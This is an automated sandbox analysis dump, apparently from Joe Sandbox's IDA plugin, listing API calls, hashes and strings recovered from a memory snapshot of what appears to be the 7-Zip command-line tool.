• Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
• Instruction ID: 7f8ac7e46a4c26738fe213097d7be04c21c40a3e0c1a30ec9130e384d6dbae79
• Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
• Instruction Fuzzy Hash: C4318633314A4196CB20EF25E44019EB731F7957D4F845222EBAE477AADF28D65ACB00
APIs
Similarity
• API ID: free$ByteStringmemmove
• String ID:
• API String ID: 400576877-0
• Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
• Instruction ID: 8711f7fd882339e2c10e948ee185b2b2191247e0277dedac868561ce772c333c
• Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
• Instruction Fuzzy Hash: 9921B57330478492EB24AF51E6903BD6260FBA87A4F484125EFAE0B794DF78C856C705
APIs
Similarity
• API ID: free$wcscmp
• String ID:
• API String ID: 4021281200-0
• Opcode ID: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
• Instruction ID: d15a2763b48687420b9f639ece2617a4a7a1c76c0b6155da475d39bc1566f7a8
• Opcode Fuzzy Hash: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
• Instruction Fuzzy Hash: 8921B07621474492DB20BE26E4403B97761E7E5BE4F185322EF7A877A4EF38D586CB00
APIs
Strings
Similarity
• API ID: free
• String ID: Unsupported charset:
• API String ID: 1294909896-616772432
• Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
• Instruction ID: f637167f627a5541c41d42de3f814448ae7ec57733b96b2e2eabf105ab9ff8c8
• Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
• Instruction Fuzzy Hash: 4921A463604A0092DB20DB18D8907AD7721E7E47E8F544327EBAE077B5CF78CA86C740
APIs
  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNELBASE ref: 001D7D6E
  • Part of subcall function 001D7D4C: GetFileAttributesW.KERNEL32 ref: 001D7DA5
  • Part of subcall function 001D7D4C: free.MSVCRT ref: 001D7DB2
• DeleteFileW.KERNEL32 ref: 001D6D90
• DeleteFileW.KERNEL32 ref: 001D6DCA
• free.MSVCRT ref: 001D6DDA
• free.MSVCRT ref: 001D6DE8
  • Part of subcall function 001D68A0: SetFileAttributesW.KERNELBASE ref: 001D68C7
Similarity
• API ID: File$Attributesfree$Delete
• String ID:
• API String ID: 324319583-0
• Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
• Instruction ID: fa2849934839c1bd9c6f0b3e3898e5235f3af13214a96968bbc9a04554d5a610
• Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
• Instruction Fuzzy Hash: 63012D22344E4145CE30AB65BC553A913225BA6BB4F5C1323EDFA8B3E6EF29C9569600
APIs
• GetLastError.KERNEL32 ref: 001E2137
• free.MSVCRT ref: 001E21BB
  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
  • Part of subcall function 001D362C: memmove.MSVCRT ref: 001D3659
• free.MSVCRT ref: 001E2182
Strings
Similarity
• API ID: free$ErrorFormatFreeLastLocalMessagememmove
• String ID: :
• API String ID: 1743135865-3653984579
• Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
• Instruction ID: 48b072640f83ad1d4b431636608ff52b3513c60794718d3ffffe979fc7e0c4df
• Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
• Instruction Fuzzy Hash: B101696730090091CA21EB25E88525E6731EBE5BF4F585322BE6E477B9DF38CB86C750
APIs
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                                                                • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                • Instruction ID: 7cc65cce434d5328cf703dbaa7df0624916f020306e4b328e7a6c66b342b3196
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701DF226200629BD7219B3D99047A96394B718BE5F914632FE4ECBB50DB28CC81D7C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                                                • API String ID: 1795875747-932691680
                                                                                                                                                                                                                                • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                • Instruction ID: 9154cbde69110487f2f53d5148c8c559cc76384e1068413798a0b84196f3baf2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA014C32266D04EADA05EF60F8853E82360EBB5749F945422E90D83664DF3CC9E5C782
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryRemovefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 736856642-0
                                                                                                                                                                                                                                • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                • Instruction ID: f89e956fd6b93ca67ab93c045899ed33529fc9a1300a77d3b8c2c56fe4d99618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F0A42220860185C934AF25D9A437D5324ABA67F8F484323EEBD877A5CF39C94ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D2F5B
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,001D302B,?,?,?,?,001D3698), ref: 001D2F2C
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D2F34
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 001D2EF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                                                • API String ID: 3321538808-3553869907
                                                                                                                                                                                                                                • Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                • Instruction ID: d4e9623a0201b4c9a02bbe3a243ac2b9f26cfee898723aed58e81d3e634bcb28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0F07670028486DB289F4AE4906ADA361E7A47D0F14C431EBAA07B11CF39D8D6CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D2AFD
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 001D2ACE
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D2AD6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                • String ID: (LP-
                                                                                                                                                                                                                                • API String ID: 3321538808-3833670221
                                                                                                                                                                                                                                • Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                • Instruction ID: c22a3fc3e854fa845de17e49b06d9e8307ab2753e86f39552016c3ffa2c2491c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F0907770024586DA249F4AE8906ADB361E7A87D4F14C026EFA907B14DB39D8D68B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputcfree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3819637083-0
APIs
• memmove.MSVCRT ref: 00213E51
  • Part of subcall function 00212B60: CompareFileTime.KERNEL32(?,?,?,00000000,00213E64), ref: 00212BA5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CompareFileTimememmove
• String ID: alternate streams$files$streams
• API String ID: 1303509325-806849385
APIs
• FormatMessageW.KERNEL32 ref: 001D6676
  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
• LocalFree.KERNEL32 ref: 001D6698
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: FormatFreeLocalMessagefreememmove
• String ID: Error #
• API String ID: 2451246624-1299485822
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
• String ID: UNC
• API String ID: 0-337201128
APIs
• fputs.MSVCRT ref: 00210661
• free.MSVCRT ref: 00210680
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$freememset
• String ID: ERROR:
• API String ID: 2276422817-977468659
APIs
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4AA
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4F8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: QueryValue
• String ID: Path64
• API String ID: 3660427363-321863482
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Can not open encrypted archive. Wrong password?, xrefs: 00214297
                                                                                                                                                                                                                                • Can not open the file as archive, xrefs: 002142D8
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs
• String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
• API String ID: 1795875747-2399861261
APIs
Strings
Similarity
• API ID: wcscmp
• String ID: \??\
• API String ID: 3392835482-3047946824
APIs
• fputs.MSVCRT ref: 00212011
  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
Strings
Similarity
• API ID: fputcfputs
• String ID: Scan$Scanning
• API String ID: 269475090-1436252306
APIs
Strings
Similarity
• API ID: AllocExceptionStringThrow
• String ID: out of memory
• API String ID: 3773818493-2599737071
APIs
• fputs.MSVCRT ref: 0021B7E4
  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
Strings
Similarity
• API ID: fputcfputs
• String ID: Scan $Scanning the drive:
• API String ID: 269475090-1085461122
APIs
• free.MSVCRT ref: 001FECEE
• free.MSVCRT ref: 001FECF6
• free.MSVCRT ref: 001FEFE3
• free.MSVCRT ref: 001FEFEB
  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4DBC
  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4DC4
  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4EAC
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                • Instruction ID: 4abf024898a820ca5bf091d25d833c10c586e9768c88b832581a742afa63279f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F841A833204E8096CB20EF26E49106EBB73F795FE4B544213EB5A27B69DB74C856CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                • Instruction ID: 39dcf0ba5c993f8acaa352d8244de42a2eecc563279bc08c01e6ec00ae3447fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41926652C7C5C1CB35CF21A058AEABB75F395784F458047DBC953BABCE39C8A88B40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                • Instruction ID: 9c7f88489a1839b4aec94a6f29d8bfc2c4acfa4cdf3f99282895ac0092058e99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC31E873611AC086C7649F26D4407AD7770F3E8FE4F594226EEAA47794DB34C442C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                • Instruction ID: ae78281c8a26ec7e0b11a5b75497a4f1dee05c1e775be920f05532815b7bd8f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2104A3201B8889DB15AF26EC557396364BF65B94F9DC125EF6D0B380DF7C8882C312
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                • Instruction ID: 4826583f6ac66bebd3ce5034c96ed097a1b7988347eb14c2fad82e50bdd556df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D219237612A9487CB21DF26D4106297361E7A5FE4B198227DE6D0B398DF38D842C760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 001E779B
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 001E77A7
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 001E783C
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 001E7848
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3168844106-0
                                                                                                                                                                                                                                • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                                                • Instruction ID: 1a5ae4cce782df1bfbd74aa8c77a5e3c888ffd12e3517f5ad41a3632fd7b208e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
